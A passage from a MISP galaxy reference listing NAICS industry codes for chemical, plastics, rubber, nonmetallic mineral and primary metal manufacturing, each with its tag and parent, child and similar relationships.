  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

325613

Surface Active Agent Manufacturing

The tag is: misp-galaxy:naics="325613"

325613 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

32562

Toilet Preparation Manufacturing

The tag is: misp-galaxy:naics="32562"

32562 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325620" with estimative-language:likelihood-probability="likely"

325620

Toilet Preparation Manufacturing

The tag is: misp-galaxy:naics="325620"

325620 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32562" with estimative-language:likelihood-probability="likely"

3259

Other Chemical Product and Preparation Manufacturing

The tag is: misp-galaxy:naics="3259"

3259 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325998" with estimative-language:likelihood-probability="likely"

32591

Printing Ink Manufacturing

The tag is: misp-galaxy:naics="32591"

32591 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325910" with estimative-language:likelihood-probability="likely"

325910

Printing Ink Manufacturing

The tag is: misp-galaxy:naics="325910"

325910 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32591" with estimative-language:likelihood-probability="likely"

32592

Explosives Manufacturing

The tag is: misp-galaxy:naics="32592"

32592 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325920" with estimative-language:likelihood-probability="likely"

325920

Explosives Manufacturing

The tag is: misp-galaxy:naics="325920"

325920 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32592" with estimative-language:likelihood-probability="likely"

32599

All Other Chemical Product and Preparation Manufacturing

The tag is: misp-galaxy:naics="32599"

32599 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

325991

Custom Compounding of Purchased Resins

The tag is: misp-galaxy:naics="325991"

325991 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

325992

Photographic Film, Paper, Plate, Chemical, and Copy Toner Manufacturing

The tag is: misp-galaxy:naics="325992"

325992 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

325998

All Other Miscellaneous Chemical Product and Preparation Manufacturing

The tag is: misp-galaxy:naics="325998"

325998 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

326

Plastics and Rubber Products Manufacturing

The tag is: misp-galaxy:naics="326"

326 has relationships with:

  • parent-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

3261

Plastics Product Manufacturing

The tag is: misp-galaxy:naics="3261"

3261 has relationships with:

  • child-of: misp-galaxy:naics="326" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32615" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32616" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32619" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326199" with estimative-language:likelihood-probability="likely"

32611

Plastics Packaging Materials and Unlaminated Film and Sheet Manufacturing

The tag is: misp-galaxy:naics="32611"

32611 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326111

Plastics Bag and Pouch Manufacturing

The tag is: misp-galaxy:naics="326111"

326111 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326112

Plastics Packaging Film and Sheet (including Laminated) Manufacturing

The tag is: misp-galaxy:naics="326112"

326112 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326113

Unlaminated Plastics Film and Sheet (except Packaging) Manufacturing

The tag is: misp-galaxy:naics="326113"

326113 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

32612

Plastics Pipe, Pipe Fitting, and Unlaminated Profile Shape Manufacturing

The tag is: misp-galaxy:naics="32612"

32612 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326121

Unlaminated Plastics Profile Shape Manufacturing

The tag is: misp-galaxy:naics="326121"

326121 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326122

Plastics Pipe and Pipe Fitting Manufacturing

The tag is: misp-galaxy:naics="326122"

326122 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

32613

Laminated Plastics Plate, Sheet (except Packaging), and Shape Manufacturing

The tag is: misp-galaxy:naics="32613"

32613 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326130" with estimative-language:likelihood-probability="likely"

326130

Laminated Plastics Plate, Sheet (except Packaging), and Shape Manufacturing

The tag is: misp-galaxy:naics="326130"

326130 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32613" with estimative-language:likelihood-probability="likely"

32614

Polystyrene Foam Product Manufacturing

The tag is: misp-galaxy:naics="32614"

32614 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326140" with estimative-language:likelihood-probability="likely"

326140

Polystyrene Foam Product Manufacturing

The tag is: misp-galaxy:naics="326140"

326140 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32614" with estimative-language:likelihood-probability="likely"

32615

Urethane and Other Foam Product (except Polystyrene) Manufacturing

The tag is: misp-galaxy:naics="32615"

32615 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326150" with estimative-language:likelihood-probability="likely"

326150

Urethane and Other Foam Product (except Polystyrene) Manufacturing

The tag is: misp-galaxy:naics="326150"

326150 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32615" with estimative-language:likelihood-probability="likely"

32616

Plastics Bottle Manufacturing

The tag is: misp-galaxy:naics="32616"

32616 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326160" with estimative-language:likelihood-probability="likely"

326160

Plastics Bottle Manufacturing

The tag is: misp-galaxy:naics="326160"

326160 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32616" with estimative-language:likelihood-probability="likely"

32619

Other Plastics Product Manufacturing

The tag is: misp-galaxy:naics="32619"

32619 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326191

Plastics Plumbing Fixture Manufacturing

The tag is: misp-galaxy:naics="326191"

326191 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326199

All Other Plastics Product Manufacturing

The tag is: misp-galaxy:naics="326199"

326199 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

3262

Rubber Product Manufacturing

The tag is: misp-galaxy:naics="3262"

3262 has relationships with:

  • child-of: misp-galaxy:naics="326" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32629" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326299" with estimative-language:likelihood-probability="likely"

32621

Tire Manufacturing

The tag is: misp-galaxy:naics="32621"

32621 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326211

Tire Manufacturing (except Retreading)

The tag is: misp-galaxy:naics="326211"

326211 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326212

Tire Retreading

The tag is: misp-galaxy:naics="326212"

326212 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

32622

Rubber and Plastics Hoses and Belting Manufacturing

The tag is: misp-galaxy:naics="32622"

32622 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326220" with estimative-language:likelihood-probability="likely"

326220

Rubber and Plastics Hoses and Belting Manufacturing

The tag is: misp-galaxy:naics="326220"

326220 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32622" with estimative-language:likelihood-probability="likely"

32629

Other Rubber Product Manufacturing

The tag is: misp-galaxy:naics="32629"

32629 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326291

Rubber Product Manufacturing for Mechanical Use

The tag is: misp-galaxy:naics="326291"

326291 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326299

All Other Rubber Product Manufacturing

The tag is: misp-galaxy:naics="326299"

326299 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

327

Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="327"

327 has relationships with:

  • parent-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

3271

Clay Product and Refractory Manufacturing

The tag is: misp-galaxy:naics="3271"

3271 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327120" with estimative-language:likelihood-probability="likely"

32711

Pottery, Ceramics, and Plumbing Fixture Manufacturing

The tag is: misp-galaxy:naics="32711"

32711 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327110" with estimative-language:likelihood-probability="likely"

327110

Pottery, Ceramics, and Plumbing Fixture Manufacturing

The tag is: misp-galaxy:naics="327110"

327110 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32711" with estimative-language:likelihood-probability="likely"

32712

Clay Building Material and Refractories Manufacturing

The tag is: misp-galaxy:naics="32712"

32712 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327120" with estimative-language:likelihood-probability="likely"

327120

Clay Building Material and Refractories Manufacturing

The tag is: misp-galaxy:naics="327120"

327120 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32712" with estimative-language:likelihood-probability="likely"

3272

Glass and Glass Product Manufacturing

The tag is: misp-galaxy:naics="3272"

3272 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327215" with estimative-language:likelihood-probability="likely"

32721

Glass and Glass Product Manufacturing

The tag is: misp-galaxy:naics="32721"

32721 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327211

Flat Glass Manufacturing

The tag is: misp-galaxy:naics="327211"

327211 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327212

Other Pressed and Blown Glass and Glassware Manufacturing

The tag is: misp-galaxy:naics="327212"

327212 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327213

Glass Container Manufacturing

The tag is: misp-galaxy:naics="327213"

327213 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327215

Glass Product Manufacturing Made of Purchased Glass

The tag is: misp-galaxy:naics="327215"

327215 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

3273

Cement and Concrete Product Manufacturing

The tag is: misp-galaxy:naics="3273"

3273 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32731" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32732" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32733" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32739" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327390" with estimative-language:likelihood-probability="likely"

32731

Cement Manufacturing

The tag is: misp-galaxy:naics="32731"

32731 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327310" with estimative-language:likelihood-probability="likely"

327310

Cement Manufacturing

The tag is: misp-galaxy:naics="327310"

327310 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32731" with estimative-language:likelihood-probability="likely"

32732

Ready-Mix Concrete Manufacturing

The tag is: misp-galaxy:naics="32732"

32732 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327320" with estimative-language:likelihood-probability="likely"

327320

Ready-Mix Concrete Manufacturing

The tag is: misp-galaxy:naics="327320"

327320 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32732" with estimative-language:likelihood-probability="likely"

32733

Concrete Pipe, Brick, and Block Manufacturing

The tag is: misp-galaxy:naics="32733"

32733 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

327331

Concrete Block and Brick Manufacturing

The tag is: misp-galaxy:naics="327331"

327331 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

327332

Concrete Pipe Manufacturing

The tag is: misp-galaxy:naics="327332"

327332 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

32739

Other Concrete Product Manufacturing

The tag is: misp-galaxy:naics="32739"

32739 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327390" with estimative-language:likelihood-probability="likely"

327390

Other Concrete Product Manufacturing

The tag is: misp-galaxy:naics="327390"

327390 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32739" with estimative-language:likelihood-probability="likely"

3274

Lime and Gypsum Product Manufacturing

The tag is: misp-galaxy:naics="3274"

3274 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32741" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32742" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327420" with estimative-language:likelihood-probability="likely"

32741

Lime Manufacturing

The tag is: misp-galaxy:naics="32741"

32741 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327410" with estimative-language:likelihood-probability="likely"

327410

Lime Manufacturing

The tag is: misp-galaxy:naics="327410"

327410 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32741" with estimative-language:likelihood-probability="likely"

32742

Gypsum Product Manufacturing

The tag is: misp-galaxy:naics="32742"

32742 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327420" with estimative-language:likelihood-probability="likely"

327420

Gypsum Product Manufacturing

The tag is: misp-galaxy:naics="327420"

327420 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32742" with estimative-language:likelihood-probability="likely"

3279

Other Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="3279"

3279 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32791" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32799" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327999" with estimative-language:likelihood-probability="likely"

32791

Abrasive Product Manufacturing

The tag is: misp-galaxy:naics="32791"

32791 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327910" with estimative-language:likelihood-probability="likely"

327910

Abrasive Product Manufacturing

The tag is: misp-galaxy:naics="327910"

327910 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32791" with estimative-language:likelihood-probability="likely"

32799

All Other Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="32799"

32799 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327991

Cut Stone and Stone Product Manufacturing

The tag is: misp-galaxy:naics="327991"

327991 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327992

Ground or Treated Mineral and Earth Manufacturing

The tag is: misp-galaxy:naics="327992"

327992 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327993

Mineral Wool Manufacturing

The tag is: misp-galaxy:naics="327993"

327993 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327999

All Other Miscellaneous Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="327999"

327999 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

331

Primary Metal Manufacturing

The tag is: misp-galaxy:naics="331"

331 has relationships with:

  • parent-of: misp-galaxy:naics="3311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

3311

Iron and Steel Mills and Ferroalloy Manufacturing

The tag is: misp-galaxy:naics="3311"

3311 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331110" with estimative-language:likelihood-probability="likely"

33111

Iron and Steel Mills and Ferroalloy Manufacturing

The tag is: misp-galaxy:naics="33111"

33111 has relationships with:

  • child-of: misp-galaxy:naics="3311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331110" with estimative-language:likelihood-probability="likely"

331110

Iron and Steel Mills and Ferroalloy Manufacturing

The tag is: misp-galaxy:naics="331110"

331110 has relationships with:

  • child-of: misp-galaxy:naics="3311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33111" with estimative-language:likelihood-probability="likely"

3312

Steel Product Manufacturing from Purchased Steel

The tag is: misp-galaxy:naics="3312"

3312 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331222" with estimative-language:likelihood-probability="likely"

33121

Iron and Steel Pipe and Tube Manufacturing from Purchased Steel

The tag is: misp-galaxy:naics="33121"

33121 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331210" with estimative-language:likelihood-probability="likely"

331210

Iron and Steel Pipe and Tube Manufacturing from Purchased Steel

The tag is: misp-galaxy:naics="331210"

331210 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33121" with estimative-language:likelihood-probability="likely"

33122

Rolling and Drawing of Purchased Steel

The tag is: misp-galaxy:naics="33122"

33122 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

331221

Rolled Steel Shape Manufacturing

The tag is: misp-galaxy:naics="331221"

331221 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

331222

Steel Wire Drawing

The tag is: misp-galaxy:naics="331222"

331222 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

3313

Alumina and Aluminum Production and Processing

The tag is: misp-galaxy:naics="3313"

3313 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331318" with estimative-language:likelihood-probability="likely"

33131

Alumina and Aluminum Production and Processing

The tag is: misp-galaxy:naics="33131"

33131 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331313

Alumina Refining and Primary Aluminum Production

The tag is: misp-galaxy:naics="331313"

331313 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331314

Secondary Smelting and Alloying of Aluminum

The tag is: misp-galaxy:naics="331314"

331314 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331315

Aluminum Sheet, Plate, and Foil Manufacturing

The tag is: misp-galaxy:naics="331315"

331315 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331318

Other Aluminum Rolling, Drawing, and Extruding

The tag is: misp-galaxy:naics="331318"

331318 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

3314

Nonferrous Metal (except Aluminum) Production and Processing

The tag is: misp-galaxy:naics="3314"

3314 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331492" with estimative-language:likelihood-probability="likely"

33141

Nonferrous Metal (except Aluminum) Smelting and Refining

The tag is: misp-galaxy:naics="33141"

33141 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331410" with estimative-language:likelihood-probability="likely"

331410

Nonferrous Metal (except Aluminum) Smelting and Refining

The tag is: misp-galaxy:naics="331410"

331410 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33141" with estimative-language:likelihood-probability="likely"

33142

Copper Rolling, Drawing, Extruding, and Alloying

The tag is: misp-galaxy:naics="33142"

33142 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331420" with estimative-language:likelihood-probability="likely"

331420

Copper Rolling, Drawing, Extruding, and Alloying

The tag is: misp-galaxy:naics="331420"

331420 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33142" with estimative-language:likelihood-probability="likely"

33149

Nonferrous Metal (except Copper and Aluminum) Rolling, Drawing, Extruding, and Alloying

The tag is: misp-galaxy:naics="33149"

33149 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

331491

Nonferrous Metal (except Copper and Aluminum) Rolling, Drawing, and Extruding

The tag is: misp-galaxy:naics="331491"

331491 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

331492

Secondary Smelting, Refining, and Alloying of Nonferrous Metal (except Copper and Aluminum)

The tag is: misp-galaxy:naics="331492"

331492 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

3315

Foundries

The tag is: misp-galaxy:naics="3315"

3315 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331529" with estimative-language:likelihood-probability="likely"

33151

Ferrous Metal Foundries

The tag is: misp-galaxy:naics="33151"

33151 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331511

Iron Foundries

The tag is: misp-galaxy:naics="331511"

331511 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331512

Steel Investment Foundries

The tag is: misp-galaxy:naics="331512"
